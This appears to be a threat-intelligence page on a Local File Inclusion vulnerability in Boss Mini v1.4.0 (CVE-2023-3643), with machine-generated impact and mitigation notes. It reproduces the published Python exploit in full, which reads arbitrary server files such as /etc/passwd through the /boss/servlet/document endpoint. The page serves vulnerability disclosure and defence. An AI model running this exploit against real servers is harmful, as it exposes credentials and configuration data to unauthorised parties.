Boss Mini v1.4.0 - Local File Inclusion (LFI)
Boss Mini v1.4.0 - Local File Inclusion (LFI)
AI Analysis
Technical Summary
Boss Mini v1.4.0 contains a Local File Inclusion (LFI) vulnerability that can be exploited to include and potentially disclose files from the local filesystem of the server hosting the application. This type of vulnerability typically arises when user input is improperly sanitized in file inclusion functions. Exploit code has been published in Python, indicating that the vulnerability is exploitable. No specific affected versions beyond v1.4.0 are listed, and no vendor patch or advisory information is provided.
Potential Impact
Successful exploitation of this LFI vulnerability can lead to unauthorized disclosure of sensitive files on the server, which may include configuration files, credentials, or other critical data. This can facilitate further attacks or compromise of the system. There is no indication of remote code execution or other elevated impacts from the provided data.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, users should consider restricting access to vulnerable components and applying input validation or filtering to mitigate exploitation. Monitor vendor channels for updates and apply patches promptly once released.
Indicators of Compromise
- exploit-code: # Exploit Title: Boss Mini v1.4.0 - Local File Inclusion (LFI) # Date: 07/12/2023 # Exploit Author: nltt0 # Version: 1.4.0 (Build 6221) # CVE: CVE-2023-3643 from requests import post from urllib.parse import quote from argparse import ArgumentParser banner = r""" _____ _ _____ / __ \ | | / ___| | / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--. | | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \ | \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ / \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ __/ | |___/ by nltt0 [https://github.com/nltt-br] """ print(banner) try: parser = ArgumentParser(description='Local file inclusion [Boss Mini]') parser.add_argument('--domain', required=True, help='Application domain') parser.add_argument('--file', required=True, help='Local file') args = parser.parse_args() host = args.domain file = args.file url = '{}/boss/servlet/document'.format(host) file2 = quote(file, safe='') headers = { 'Host': host, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0', 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange', 'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host) } data = { 'path': file2 } try: req = post(url, headers=headers, data=data, verify=False) if req.status_code == 200: print(req.text) except Exception as e: print('Error in {}'.format(e)) except Exception as e: print('Error in {}'.format(e))
Boss Mini v1.4.0 - Local File Inclusion (LFI)
Description
Boss Mini v1.4.0 - Local File Inclusion (LFI)
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
Boss Mini v1.4.0 contains a Local File Inclusion (LFI) vulnerability that can be exploited to include and potentially disclose files from the local filesystem of the server hosting the application. This type of vulnerability typically arises when user input is improperly sanitized in file inclusion functions. Exploit code has been published in Python, indicating that the vulnerability is exploitable. No specific affected versions beyond v1.4.0 are listed, and no vendor patch or advisory information is provided.
Potential Impact
Successful exploitation of this LFI vulnerability can lead to unauthorized disclosure of sensitive files on the server, which may include configuration files, credentials, or other critical data. This can facilitate further attacks or compromise of the system. There is no indication of remote code execution or other elevated impacts from the provided data.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, users should consider restricting access to vulnerable components and applying input validation or filtering to mitigate exploitation. Monitor vendor channels for updates and apply patches promptly once released.
Technical Details
- Edb Id
- 52482
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Boss Mini v1.4.0 - Local File Inclusion (LFI)
# Exploit Title: Boss Mini v1.4.0 - Local File Inclusion (LFI) # Date: 07/12/2023 # Exploit Author: nltt0 # Version: 1.4.0 (Build 6221) # CVE: CVE-2023-3643 from requests import post from urllib.parse import quote from argparse import ArgumentParser banner = r""" _____ _ _____ / __ \ | | / ___| | / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--. | | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \ | \__/\ (_| | | (_| | | | | (_... (1411 more characters)
Threat ID: 69a792c9d1a09e29cbc1c319
Added to database: 3/4/2026, 2:02:49 AM
Last enriched: 4/7/2026, 11:03:57 AM
Last updated: 4/18/2026, 5:21:55 AM
Views: 115
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.